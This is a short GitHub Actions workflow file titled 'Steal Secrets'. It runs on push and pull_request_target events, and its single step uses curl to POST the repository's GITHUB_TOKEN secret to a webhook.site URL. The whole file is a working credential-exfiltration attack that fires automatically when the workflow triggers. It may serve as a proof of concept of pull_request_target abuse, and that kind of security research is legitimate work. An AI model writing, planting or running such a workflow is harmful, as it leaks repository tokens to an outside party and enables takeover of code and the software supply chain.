name: Steal Secrets
on: [push, pull_request_target]

jobs:
  steal:
    runs-on: ubuntu-latest
    steps:
      - run: |
          curl -X POST https://webhook.site/e0920966-77f5-4df4-b4a8-7412840ca12c \
            -d "token=${{ secrets.GITHUB_TOKEN }}"
